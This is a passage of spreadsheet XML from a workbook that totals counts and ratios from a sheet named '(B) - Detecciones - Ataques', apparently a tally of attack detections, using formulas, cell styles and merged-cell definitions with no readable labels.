        <v>0</v>
      </c>
      <c r="H127" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ123</f>
        <v>0</v>
      </c>
      <c r="I127" s="271">
        <f>'(B) - Detecciones - Ataques'!AS123</f>
        <v>0</v>
      </c>
      <c r="J127" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ123</f>
        <v>0</v>
      </c>
      <c r="K127" s="271">
        <f>'(B) - Detecciones - Ataques'!BP123</f>
        <v>0</v>
      </c>
      <c r="L127" s="281">
        <f>'(B) - Detecciones - Ataques'!BW123</f>
        <v>0</v>
      </c>
      <c r="M127" s="271">
        <f>'(B) - Detecciones - Ataques'!CM123</f>
        <v>0</v>
      </c>
      <c r="N127" s="281">
        <f>'(B) - Detecciones - Ataques'!CT123</f>
        <v>0</v>
      </c>
      <c r="O127" s="280">
        <f>'(B) - Detecciones - Ataques'!EC123</f>
        <v>0</v>
      </c>
      <c r="P127" s="281">
        <f>'(B) - Detecciones - Ataques'!ED123</f>
        <v>0</v>
      </c>
      <c r="Q127" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM127" s="299"/>
      <c r="AN127" s="299"/>
      <c r="AO127" s="298"/>
      <c r="AP127" s="299"/>
      <c r="AQ127" s="298"/>
    </row>
    <row r="128" ht="60.0" customHeight="1">
      <c r="B128" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C128" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D128" s="143" t="s">
        <v>1289</v>
      </c>
      <c r="E128" s="145" t="s">
        <v>1295</v>
      </c>
      <c r="F128" s="280">
        <f>'(B) - Detecciones - Ataques'!P124</f>
        <v>1</v>
      </c>
      <c r="G128" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ124</f>
        <v>0</v>
      </c>
      <c r="H128" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ124</f>
        <v>0</v>
      </c>
      <c r="I128" s="271">
        <f>'(B) - Detecciones - Ataques'!AS124</f>
        <v>0</v>
      </c>
      <c r="J128" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ124</f>
        <v>0</v>
      </c>
      <c r="K128" s="271">
        <f>'(B) - Detecciones - Ataques'!BP124</f>
        <v>0</v>
      </c>
      <c r="L128" s="281">
        <f>'(B) - Detecciones - Ataques'!BW124</f>
        <v>0</v>
      </c>
      <c r="M128" s="271">
        <f>'(B) - Detecciones - Ataques'!CM124</f>
        <v>0</v>
      </c>
      <c r="N128" s="281">
        <f>'(B) - Detecciones - Ataques'!CT124</f>
        <v>0</v>
      </c>
      <c r="O128" s="280">
        <f>'(B) - Detecciones - Ataques'!EC124</f>
        <v>0</v>
      </c>
      <c r="P128" s="281">
        <f>'(B) - Detecciones - Ataques'!ED124</f>
        <v>0</v>
      </c>
      <c r="Q128" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM128" s="299"/>
      <c r="AN128" s="299"/>
      <c r="AO128" s="298"/>
      <c r="AP128" s="299"/>
      <c r="AQ128" s="298"/>
    </row>
    <row r="129" ht="60.0" customHeight="1">
      <c r="B129" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C129" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D129" s="143" t="s">
        <v>1300</v>
      </c>
      <c r="E129" s="145" t="s">
        <v>1304</v>
      </c>
      <c r="F129" s="280">
        <f>'(B) - Detecciones - Ataques'!P125</f>
        <v>1</v>
      </c>
      <c r="G129" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ125</f>
        <v>0</v>
      </c>
      <c r="H129" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ125</f>
        <v>0</v>
      </c>
      <c r="I129" s="271">
        <f>'(B) - Detecciones - Ataques'!AS125</f>
        <v>0</v>
      </c>
      <c r="J129" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ125</f>
        <v>0</v>
      </c>
      <c r="K129" s="271">
        <f>'(B) - Detecciones - Ataques'!BP125</f>
        <v>0</v>
      </c>
      <c r="L129" s="281">
        <f>'(B) - Detecciones - Ataques'!BW125</f>
        <v>0</v>
      </c>
      <c r="M129" s="271">
        <f>'(B) - Detecciones - Ataques'!CM125</f>
        <v>0</v>
      </c>
      <c r="N129" s="281">
        <f>'(B) - Detecciones - Ataques'!CT125</f>
        <v>0</v>
      </c>
      <c r="O129" s="280">
        <f>'(B) - Detecciones - Ataques'!EC125</f>
        <v>0</v>
      </c>
      <c r="P129" s="281">
        <f>'(B) - Detecciones - Ataques'!ED125</f>
        <v>0</v>
      </c>
      <c r="Q129" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM129" s="299"/>
      <c r="AN129" s="299"/>
      <c r="AO129" s="298"/>
      <c r="AP129" s="299"/>
      <c r="AQ129" s="298"/>
    </row>
    <row r="130" ht="60.0" customHeight="1">
      <c r="B130" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C130" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D130" s="143" t="s">
        <v>1310</v>
      </c>
      <c r="E130" s="145" t="s">
        <v>1526</v>
      </c>
      <c r="F130" s="280">
        <f>'(B) - Detecciones - Ataques'!P126</f>
        <v>1</v>
      </c>
      <c r="G130" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ126</f>
        <v>0</v>
      </c>
      <c r="H130" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ126</f>
        <v>0</v>
      </c>
      <c r="I130" s="271">
        <f>'(B) - Detecciones - Ataques'!AS126</f>
        <v>0</v>
      </c>
      <c r="J130" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ126</f>
        <v>0</v>
      </c>
      <c r="K130" s="271">
        <f>'(B) - Detecciones - Ataques'!BP126</f>
        <v>0</v>
      </c>
      <c r="L130" s="281">
        <f>'(B) - Detecciones - Ataques'!BW126</f>
        <v>0</v>
      </c>
      <c r="M130" s="271">
        <f>'(B) - Detecciones - Ataques'!CM126</f>
        <v>0</v>
      </c>
      <c r="N130" s="281">
        <f>'(B) - Detecciones - Ataques'!CT126</f>
        <v>0</v>
      </c>
      <c r="O130" s="280">
        <f>'(B) - Detecciones - Ataques'!EC126</f>
        <v>0</v>
      </c>
      <c r="P130" s="281">
        <f>'(B) - Detecciones - Ataques'!ED126</f>
        <v>0</v>
      </c>
      <c r="Q130" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM130" s="299"/>
      <c r="AN130" s="299"/>
      <c r="AO130" s="298"/>
      <c r="AP130" s="299"/>
      <c r="AQ130" s="298"/>
    </row>
    <row r="131" ht="60.0" customHeight="1">
      <c r="B131" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C131" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D131" s="143" t="s">
        <v>1318</v>
      </c>
      <c r="E131" s="145" t="s">
        <v>1322</v>
      </c>
      <c r="F131" s="280">
        <f>'(B) - Detecciones - Ataques'!P127</f>
        <v>1</v>
      </c>
      <c r="G131" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ127</f>
        <v>0</v>
      </c>
      <c r="H131" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ127</f>
        <v>0</v>
      </c>
      <c r="I131" s="271">
        <f>'(B) - Detecciones - Ataques'!AS127</f>
        <v>0</v>
      </c>
      <c r="J131" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ127</f>
        <v>0</v>
      </c>
      <c r="K131" s="271">
        <f>'(B) - Detecciones - Ataques'!BP127</f>
        <v>0</v>
      </c>
      <c r="L131" s="281">
        <f>'(B) - Detecciones - Ataques'!BW127</f>
        <v>0</v>
      </c>
      <c r="M131" s="271">
        <f>'(B) - Detecciones - Ataques'!CM127</f>
        <v>0</v>
      </c>
      <c r="N131" s="281">
        <f>'(B) - Detecciones - Ataques'!CT127</f>
        <v>0</v>
      </c>
      <c r="O131" s="280">
        <f>'(B) - Detecciones - Ataques'!EC127</f>
        <v>0</v>
      </c>
      <c r="P131" s="281">
        <f>'(B) - Detecciones - Ataques'!ED127</f>
        <v>0</v>
      </c>
      <c r="Q131" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM131" s="299"/>
      <c r="AN131" s="299"/>
      <c r="AO131" s="298"/>
      <c r="AP131" s="299"/>
      <c r="AQ131" s="298"/>
    </row>
    <row r="132" ht="60.0" customHeight="1">
      <c r="B132" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C132" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D132" s="143" t="s">
        <v>1326</v>
      </c>
      <c r="E132" s="145" t="s">
        <v>1329</v>
      </c>
      <c r="F132" s="280">
        <f>'(B) - Detecciones - Ataques'!P128</f>
        <v>1</v>
      </c>
      <c r="G132" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ128</f>
        <v>0</v>
      </c>
      <c r="H132" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ128</f>
        <v>0</v>
      </c>
      <c r="I132" s="271">
        <f>'(B) - Detecciones - Ataques'!AS128</f>
        <v>0</v>
      </c>
      <c r="J132" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ128</f>
        <v>0</v>
      </c>
      <c r="K132" s="271">
        <f>'(B) - Detecciones - Ataques'!BP128</f>
        <v>0</v>
      </c>
      <c r="L132" s="281">
        <f>'(B) - Detecciones - Ataques'!BW128</f>
        <v>0</v>
      </c>
      <c r="M132" s="271">
        <f>'(B) - Detecciones - Ataques'!CM128</f>
        <v>0</v>
      </c>
      <c r="N132" s="281">
        <f>'(B) - Detecciones - Ataques'!CT128</f>
        <v>0</v>
      </c>
      <c r="O132" s="280">
        <f>'(B) - Detecciones - Ataques'!EC128</f>
        <v>0</v>
      </c>
      <c r="P132" s="281">
        <f>'(B) - Detecciones - Ataques'!ED128</f>
        <v>0</v>
      </c>
      <c r="Q132" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM132" s="299"/>
      <c r="AN132" s="299"/>
      <c r="AO132" s="298"/>
      <c r="AP132" s="299"/>
      <c r="AQ132" s="298"/>
    </row>
    <row r="133" ht="60.0" customHeight="1">
      <c r="B133" s="142" t="s">
        <v>1245</v>
      </c>
      <c r="C133" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D133" s="143" t="s">
        <v>1338</v>
      </c>
      <c r="E133" s="145" t="s">
        <v>1344</v>
      </c>
      <c r="F133" s="280">
        <f>'(B) - Detecciones - Ataques'!P129</f>
        <v>1</v>
      </c>
      <c r="G133" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ129</f>
        <v>0</v>
      </c>
      <c r="H133" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ129</f>
        <v>0</v>
      </c>
      <c r="I133" s="271">
        <f>'(B) - Detecciones - Ataques'!AS129</f>
        <v>0</v>
      </c>
      <c r="J133" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ129</f>
        <v>0</v>
      </c>
      <c r="K133" s="271">
        <f>'(B) - Detecciones - Ataques'!BP129</f>
        <v>0</v>
      </c>
      <c r="L133" s="281">
        <f>'(B) - Detecciones - Ataques'!BW129</f>
        <v>0</v>
      </c>
      <c r="M133" s="271">
        <f>'(B) - Detecciones - Ataques'!CM129</f>
        <v>0</v>
      </c>
      <c r="N133" s="281">
        <f>'(B) - Detecciones - Ataques'!CT129</f>
        <v>0</v>
      </c>
      <c r="O133" s="280">
        <f>'(B) - Detecciones - Ataques'!EC129</f>
        <v>0</v>
      </c>
      <c r="P133" s="281">
        <f>'(B) - Detecciones - Ataques'!ED129</f>
        <v>0</v>
      </c>
      <c r="Q133" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM133" s="299"/>
      <c r="AN133" s="299"/>
      <c r="AO133" s="298"/>
      <c r="AP133" s="299"/>
      <c r="AQ133" s="298"/>
    </row>
    <row r="134" ht="60.0" customHeight="1">
      <c r="B134" s="142" t="s">
        <v>1347</v>
      </c>
      <c r="C134" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D134" s="143" t="s">
        <v>1349</v>
      </c>
      <c r="E134" s="145" t="s">
        <v>1527</v>
      </c>
      <c r="F134" s="280">
        <f>'(B) - Detecciones - Ataques'!P130</f>
        <v>1</v>
      </c>
      <c r="G134" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ130</f>
        <v>0</v>
      </c>
      <c r="H134" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ130</f>
        <v>0</v>
      </c>
      <c r="I134" s="271">
        <f>'(B) - Detecciones - Ataques'!AS130</f>
        <v>0</v>
      </c>
      <c r="J134" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ130</f>
        <v>0</v>
      </c>
      <c r="K134" s="271">
        <f>'(B) - Detecciones - Ataques'!BP130</f>
        <v>0</v>
      </c>
      <c r="L134" s="281">
        <f>'(B) - Detecciones - Ataques'!BW130</f>
        <v>0</v>
      </c>
      <c r="M134" s="271">
        <f>'(B) - Detecciones - Ataques'!CM130</f>
        <v>0</v>
      </c>
      <c r="N134" s="281">
        <f>'(B) - Detecciones - Ataques'!CT130</f>
        <v>0</v>
      </c>
      <c r="O134" s="280">
        <f>'(B) - Detecciones - Ataques'!EC130</f>
        <v>0</v>
      </c>
      <c r="P134" s="281">
        <f>'(B) - Detecciones - Ataques'!ED130</f>
        <v>0</v>
      </c>
      <c r="Q134" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AM134" s="299"/>
      <c r="AN134" s="299"/>
      <c r="AO134" s="298"/>
      <c r="AP134" s="299"/>
      <c r="AQ134" s="298"/>
    </row>
    <row r="135" ht="60.0" customHeight="1">
      <c r="B135" s="142" t="s">
        <v>1347</v>
      </c>
      <c r="C135" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D135" s="143" t="s">
        <v>1360</v>
      </c>
      <c r="E135" s="145" t="s">
        <v>1528</v>
      </c>
      <c r="F135" s="280">
        <f>'(B) - Detecciones - Ataques'!P131</f>
        <v>1</v>
      </c>
      <c r="G135" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ131</f>
        <v>1</v>
      </c>
      <c r="H135" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ131</f>
        <v>1</v>
      </c>
      <c r="I135" s="271">
        <f>'(B) - Detecciones - Ataques'!AS131</f>
        <v>1</v>
      </c>
      <c r="J135" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ131</f>
        <v>1</v>
      </c>
      <c r="K135" s="271">
        <f>'(B) - Detecciones - Ataques'!BP131</f>
        <v>1</v>
      </c>
      <c r="L135" s="281">
        <f>'(B) - Detecciones - Ataques'!BW131</f>
        <v>1</v>
      </c>
      <c r="M135" s="271">
        <f>'(B) - Detecciones - Ataques'!CM131</f>
        <v>1</v>
      </c>
      <c r="N135" s="281">
        <f>'(B) - Detecciones - Ataques'!CT131</f>
        <v>1</v>
      </c>
      <c r="O135" s="280">
        <f>'(B) - Detecciones - Ataques'!EC131</f>
        <v>0</v>
      </c>
      <c r="P135" s="281">
        <f>'(B) - Detecciones - Ataques'!ED131</f>
        <v>0</v>
      </c>
      <c r="Q135" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AM135" s="299"/>
      <c r="AN135" s="299"/>
      <c r="AO135" s="298"/>
      <c r="AP135" s="299"/>
      <c r="AQ135" s="298"/>
    </row>
    <row r="136" ht="60.0" customHeight="1">
      <c r="B136" s="142" t="s">
        <v>1347</v>
      </c>
      <c r="C136" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D136" s="143" t="s">
        <v>1372</v>
      </c>
      <c r="E136" s="145" t="s">
        <v>1375</v>
      </c>
      <c r="F136" s="280">
        <f>'(B) - Detecciones - Ataques'!P132</f>
        <v>1</v>
      </c>
      <c r="G136" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ132</f>
        <v>0</v>
      </c>
      <c r="H136" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ132</f>
        <v>0</v>
      </c>
      <c r="I136" s="271">
        <f>'(B) - Detecciones - Ataques'!AS132</f>
        <v>0</v>
      </c>
      <c r="J136" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ132</f>
        <v>0</v>
      </c>
      <c r="K136" s="271">
        <f>'(B) - Detecciones - Ataques'!BP132</f>
        <v>0</v>
      </c>
      <c r="L136" s="281">
        <f>'(B) - Detecciones - Ataques'!BW132</f>
        <v>0</v>
      </c>
      <c r="M136" s="271">
        <f>'(B) - Detecciones - Ataques'!CM132</f>
        <v>0</v>
      </c>
      <c r="N136" s="281">
        <f>'(B) - Detecciones - Ataques'!CT132</f>
        <v>0</v>
      </c>
      <c r="O136" s="280">
        <f>'(B) - Detecciones - Ataques'!EC132</f>
        <v>0</v>
      </c>
      <c r="P136" s="281">
        <f>'(B) - Detecciones - Ataques'!ED132</f>
        <v>0</v>
      </c>
      <c r="Q136" s="282" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="137" ht="60.0" customHeight="1">
      <c r="B137" s="303" t="s">
        <v>1347</v>
      </c>
      <c r="C137" s="304" t="s">
        <v>12</v>
      </c>
      <c r="D137" s="304" t="s">
        <v>1377</v>
      </c>
      <c r="E137" s="305" t="s">
        <v>1383</v>
      </c>
      <c r="F137" s="306">
        <f>'(B) - Detecciones - Ataques'!P133</f>
        <v>1</v>
      </c>
      <c r="G137" s="306">
        <f>'(B) - Detecciones - Ataques'!DJ133</f>
        <v>1</v>
      </c>
      <c r="H137" s="307">
        <f>'(B) - Detecciones - Ataques'!DQ133</f>
        <v>1</v>
      </c>
      <c r="I137" s="271">
        <f>'(B) - Detecciones - Ataques'!AS133</f>
        <v>0</v>
      </c>
      <c r="J137" s="307">
        <f>'(B) - Detecciones - Ataques'!AZ133</f>
        <v>0</v>
      </c>
      <c r="K137" s="271">
        <f>'(B) - Detecciones - Ataques'!BP133</f>
        <v>1</v>
      </c>
      <c r="L137" s="307">
        <f>'(B) - Detecciones - Ataques'!BW133</f>
        <v>1</v>
      </c>
      <c r="M137" s="271">
        <f>'(B) - Detecciones - Ataques'!CM133</f>
        <v>1</v>
      </c>
      <c r="N137" s="307">
        <f>'(B) - Detecciones - Ataques'!CT133</f>
        <v>1</v>
      </c>
      <c r="O137" s="306">
        <f>'(B) - Detecciones - Ataques'!EC133</f>
        <v>0</v>
      </c>
      <c r="P137" s="307">
        <f>'(B) - Detecciones - Ataques'!ED133</f>
        <v>0</v>
      </c>
      <c r="Q137" s="308" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="138">
      <c r="E138" s="252"/>
      <c r="F138" s="252"/>
      <c r="G138" s="252"/>
      <c r="H138" s="252"/>
      <c r="I138" s="252"/>
      <c r="J138" s="252"/>
      <c r="K138" s="252"/>
      <c r="L138" s="252"/>
      <c r="M138" s="252"/>
      <c r="N138" s="252"/>
      <c r="O138" s="252"/>
      <c r="P138" s="252"/>
    </row>
    <row r="139">
      <c r="E139" s="252"/>
      <c r="F139" s="249" t="s">
        <v>1529</v>
      </c>
      <c r="G139" s="249" t="s">
        <v>1530</v>
      </c>
      <c r="H139" s="249" t="s">
        <v>1503</v>
      </c>
      <c r="I139" s="249" t="s">
        <v>1531</v>
      </c>
      <c r="J139" s="249" t="s">
        <v>1496</v>
      </c>
      <c r="K139" s="249" t="s">
        <v>1532</v>
      </c>
      <c r="L139" s="249" t="s">
        <v>1498</v>
      </c>
      <c r="M139" s="249" t="s">
        <v>1533</v>
      </c>
      <c r="N139" s="249" t="s">
        <v>1500</v>
      </c>
      <c r="O139" s="249" t="s">
        <v>1534</v>
      </c>
      <c r="P139" s="249" t="s">
        <v>1502</v>
      </c>
    </row>
    <row r="140" ht="58.5" customHeight="1">
      <c r="B140" s="309"/>
      <c r="C140" s="309"/>
      <c r="D140" s="309" t="s">
        <v>1490</v>
      </c>
      <c r="E140" s="310" t="s">
        <v>1535</v>
      </c>
      <c r="F140" s="311">
        <f t="shared" ref="F140:G140" si="25">SUM(F12:F137)</f>
        <v>160819</v>
      </c>
      <c r="G140" s="311">
        <f t="shared" si="25"/>
        <v>431</v>
      </c>
      <c r="H140" s="312">
        <f>G140/F140</f>
        <v>0.002680031588</v>
      </c>
      <c r="I140" s="311">
        <f>SUM(I12:I137)</f>
        <v>148</v>
      </c>
      <c r="J140" s="312">
        <f>I140/F140</f>
        <v>0.0009202892693</v>
      </c>
      <c r="K140" s="311">
        <f>SUM(K12:K137)</f>
        <v>341</v>
      </c>
      <c r="L140" s="312">
        <f>K140/F140</f>
        <v>0.002120396222</v>
      </c>
      <c r="M140" s="311">
        <f>SUM(M12:M137)</f>
        <v>362</v>
      </c>
      <c r="N140" s="312">
        <f>M140/F140</f>
        <v>0.002250977807</v>
      </c>
      <c r="O140" s="311">
        <f>SUM(O12:O137)</f>
        <v>880</v>
      </c>
      <c r="P140" s="312">
        <f>O140/F140</f>
        <v>0.00547199025</v>
      </c>
    </row>
    <row r="141" ht="54.0" customHeight="1">
      <c r="B141" s="309"/>
      <c r="C141" s="309"/>
      <c r="E141" s="310" t="s">
        <v>1536</v>
      </c>
      <c r="F141" s="313">
        <f>F140</f>
        <v>160819</v>
      </c>
      <c r="G141" s="314">
        <f>F140-G140</f>
        <v>160388</v>
      </c>
      <c r="H141" s="315">
        <f>G141/F140</f>
        <v>0.9973199684</v>
      </c>
      <c r="I141" s="314">
        <f>F141-I140</f>
        <v>160671</v>
      </c>
      <c r="J141" s="315">
        <f>1-J140</f>
        <v>0.9990797107</v>
      </c>
      <c r="K141" s="316">
        <f>F141-K140</f>
        <v>160478</v>
      </c>
      <c r="L141" s="315">
        <f>1-L140</f>
        <v>0.9978796038</v>
      </c>
      <c r="M141" s="316">
        <f>F141-M140</f>
        <v>160457</v>
      </c>
      <c r="N141" s="315">
        <f>1-N140</f>
        <v>0.9977490222</v>
      </c>
      <c r="O141" s="314">
        <f>F140-O140</f>
        <v>159939</v>
      </c>
      <c r="P141" s="315">
        <f>O141/F140</f>
        <v>0.9945280098</v>
      </c>
    </row>
    <row r="143">
      <c r="F143" s="249" t="s">
        <v>1529</v>
      </c>
      <c r="G143" s="249" t="s">
        <v>1530</v>
      </c>
      <c r="H143" s="249" t="s">
        <v>1503</v>
      </c>
      <c r="I143" s="249"/>
      <c r="J143" s="249"/>
      <c r="K143" s="249"/>
      <c r="L143" s="249"/>
      <c r="M143" s="249"/>
      <c r="N143" s="249"/>
      <c r="O143" s="249" t="s">
        <v>1534</v>
      </c>
      <c r="P143" s="249" t="s">
        <v>1502</v>
      </c>
    </row>
    <row r="144" ht="57.0" customHeight="1">
      <c r="B144" s="317"/>
      <c r="C144" s="317"/>
      <c r="D144" s="317" t="s">
        <v>1491</v>
      </c>
      <c r="E144" s="310" t="s">
        <v>1535</v>
      </c>
      <c r="F144" s="311">
        <f t="shared" ref="F144:G144" si="26">SUMIF($Q12:$Q137,"✔",F12:F137)</f>
        <v>160359</v>
      </c>
      <c r="G144" s="311">
        <f t="shared" si="26"/>
        <v>428</v>
      </c>
      <c r="H144" s="312">
        <f t="shared" ref="H144:H145" si="27">G144/F144</f>
        <v>0.002669011406</v>
      </c>
      <c r="I144" s="311">
        <f>SUMIF($Q12:$Q137,"✔",I12:I137)</f>
        <v>147</v>
      </c>
      <c r="J144" s="312">
        <f>I144/F144</f>
        <v>0.0009166931697</v>
      </c>
      <c r="K144" s="311">
        <f>SUMIF($Q12:$Q137,"✔",K12:K137)</f>
        <v>340</v>
      </c>
      <c r="L144" s="312">
        <f>K144/F144</f>
        <v>0.002120242705</v>
      </c>
      <c r="M144" s="311">
        <f>SUMIF($Q12:$Q137,"✔",M12:M137)</f>
        <v>360</v>
      </c>
      <c r="N144" s="312">
        <f>M144/F144</f>
        <v>0.002244962865</v>
      </c>
      <c r="O144" s="311">
        <f>SUMIF($Q12:$Q137,"✔",O12:O137)</f>
        <v>866</v>
      </c>
      <c r="P144" s="312">
        <f t="shared" ref="P144:P145" si="28">O144/F144</f>
        <v>0.005400382891</v>
      </c>
    </row>
    <row r="145" ht="62.25" customHeight="1">
      <c r="B145" s="317"/>
      <c r="C145" s="317"/>
      <c r="E145" s="310" t="s">
        <v>1536</v>
      </c>
      <c r="F145" s="313">
        <f>F144</f>
        <v>160359</v>
      </c>
      <c r="G145" s="314">
        <f>F145-G144</f>
        <v>159931</v>
      </c>
      <c r="H145" s="315">
        <f t="shared" si="27"/>
        <v>0.9973309886</v>
      </c>
      <c r="I145" s="316">
        <f>F145-I144</f>
        <v>160212</v>
      </c>
      <c r="J145" s="315">
        <f>1-J144</f>
        <v>0.9990833068</v>
      </c>
      <c r="K145" s="316">
        <f>F145-K144</f>
        <v>160019</v>
      </c>
      <c r="L145" s="315">
        <f>1-L144</f>
        <v>0.9978797573</v>
      </c>
      <c r="M145" s="316">
        <f>F145-M144</f>
        <v>159999</v>
      </c>
      <c r="N145" s="315">
        <f>1-N144</f>
        <v>0.9977550371</v>
      </c>
      <c r="O145" s="314">
        <f>F145-O144</f>
        <v>159493</v>
      </c>
      <c r="P145" s="315">
        <f t="shared" si="28"/>
        <v>0.9945996171</v>
      </c>
    </row>
    <row r="147" ht="34.5" customHeight="1"/>
    <row r="148" ht="17.25" customHeight="1">
      <c r="E148" s="252"/>
      <c r="F148" s="249" t="s">
        <v>1468</v>
      </c>
      <c r="H148" s="249" t="s">
        <v>1503</v>
      </c>
      <c r="I148" s="249"/>
      <c r="J148" s="249" t="s">
        <v>1496</v>
      </c>
      <c r="K148" s="249"/>
      <c r="L148" s="249" t="s">
        <v>1498</v>
      </c>
      <c r="M148" s="249"/>
      <c r="N148" s="249" t="s">
        <v>1500</v>
      </c>
      <c r="O148" s="249"/>
      <c r="P148" s="249" t="s">
        <v>1502</v>
      </c>
    </row>
    <row r="149" ht="72.0" customHeight="1">
      <c r="B149" s="309"/>
      <c r="C149" s="309"/>
      <c r="D149" s="317" t="s">
        <v>1507</v>
      </c>
      <c r="E149" s="310" t="s">
        <v>1535</v>
      </c>
      <c r="F149" s="311">
        <f>COUNTIF(Q12:Q137,"✔")</f>
        <v>67</v>
      </c>
      <c r="H149" s="312">
        <f>AVERAGEIF($Q$12:$Q$137,"✔",H12:H137)</f>
        <v>0.3225890747</v>
      </c>
      <c r="I149" s="312"/>
      <c r="J149" s="312">
        <f>AVERAGEIF($Q$12:$Q$137,"✔",J12:J137)</f>
        <v>0.09728315662</v>
      </c>
      <c r="K149" s="312"/>
      <c r="L149" s="312">
        <f>AVERAGEIF($Q$12:$Q$137,"✔",L12:L137)</f>
        <v>0.1729958248</v>
      </c>
      <c r="M149" s="312"/>
      <c r="N149" s="312">
        <f>AVERAGEIF($Q$12:$Q$137,"✔",N12:N137)</f>
        <v>0.2476897644</v>
      </c>
      <c r="O149" s="311"/>
      <c r="P149" s="312">
        <f>AVERAGEIF(Q12:Q137,"✔",P12:P137)</f>
        <v>2.514636177</v>
      </c>
    </row>
    <row r="150" ht="93.0" customHeight="1">
      <c r="B150" s="309"/>
      <c r="C150" s="309"/>
      <c r="E150" s="310" t="s">
        <v>1536</v>
      </c>
      <c r="F150" s="313">
        <f>F149</f>
        <v>67</v>
      </c>
      <c r="H150" s="315">
        <f>1-H149</f>
        <v>0.6774109253</v>
      </c>
      <c r="I150" s="315"/>
      <c r="J150" s="315">
        <f>1-J149</f>
        <v>0.9027168434</v>
      </c>
      <c r="K150" s="315"/>
      <c r="L150" s="315">
        <f>1-L149</f>
        <v>0.8270041752</v>
      </c>
      <c r="M150" s="315"/>
      <c r="N150" s="315">
        <f>1-N149</f>
        <v>0.7523102356</v>
      </c>
      <c r="O150" s="314"/>
      <c r="P150" s="315">
        <f>1-P149</f>
        <v>-1.514636177</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="11">
    <mergeCell ref="B2:Q6"/>
    <mergeCell ref="D140:D141"/>
    <mergeCell ref="D144:D145"/>
    <mergeCell ref="D149:D150"/>
    <mergeCell ref="T2:AF6"/>
    <mergeCell ref="AL2:AX6"/>
    <mergeCell ref="T8:Y9"/>
    <mergeCell ref="AA8:AF9"/>
    <mergeCell ref="AL8:AQ9"/>
    <mergeCell ref="AS8:AX9"/>
    <mergeCell ref="AA34:AF3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43.63"/>
    <col customWidth="1" min="6" max="6" width="32.13"/>
    <col customWidth="1" min="8" max="8" width="36.25"/>
    <col customWidth="1" min="9" max="9" width="21.5"/>
  </cols>
  <sheetData>
    <row r="7">
      <c r="E7" s="256" t="s">
        <v>1537</v>
      </c>
      <c r="F7" s="4"/>
      <c r="G7" s="318" t="s">
        <v>1482</v>
      </c>
    </row>
    <row r="8">
      <c r="E8" s="226" t="s">
        <v>1466</v>
      </c>
      <c r="F8" s="228" t="s">
        <v>1472</v>
      </c>
      <c r="G8" s="224" t="s">
        <v>1482</v>
      </c>
    </row>
    <row r="9">
      <c r="E9" s="236" t="s">
        <v>97</v>
      </c>
      <c r="F9" s="238">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E9,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>3</v>
      </c>
      <c r="G9" s="238">
        <v>3.0</v>
      </c>
    </row>
    <row r="10">
      <c r="E10" s="233" t="s">
        <v>204</v>
      </c>
      <c r="F10" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E10,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>1</v>
      </c>
      <c r="G10" s="235">
        <v>1.0</v>
      </c>
    </row>
    <row r="11">
      <c r="E11" s="233" t="s">
        <v>261</v>
      </c>
      <c r="F11" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E11,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>7</v>
      </c>
      <c r="G11" s="235">
        <v>7.0</v>
      </c>
    </row>
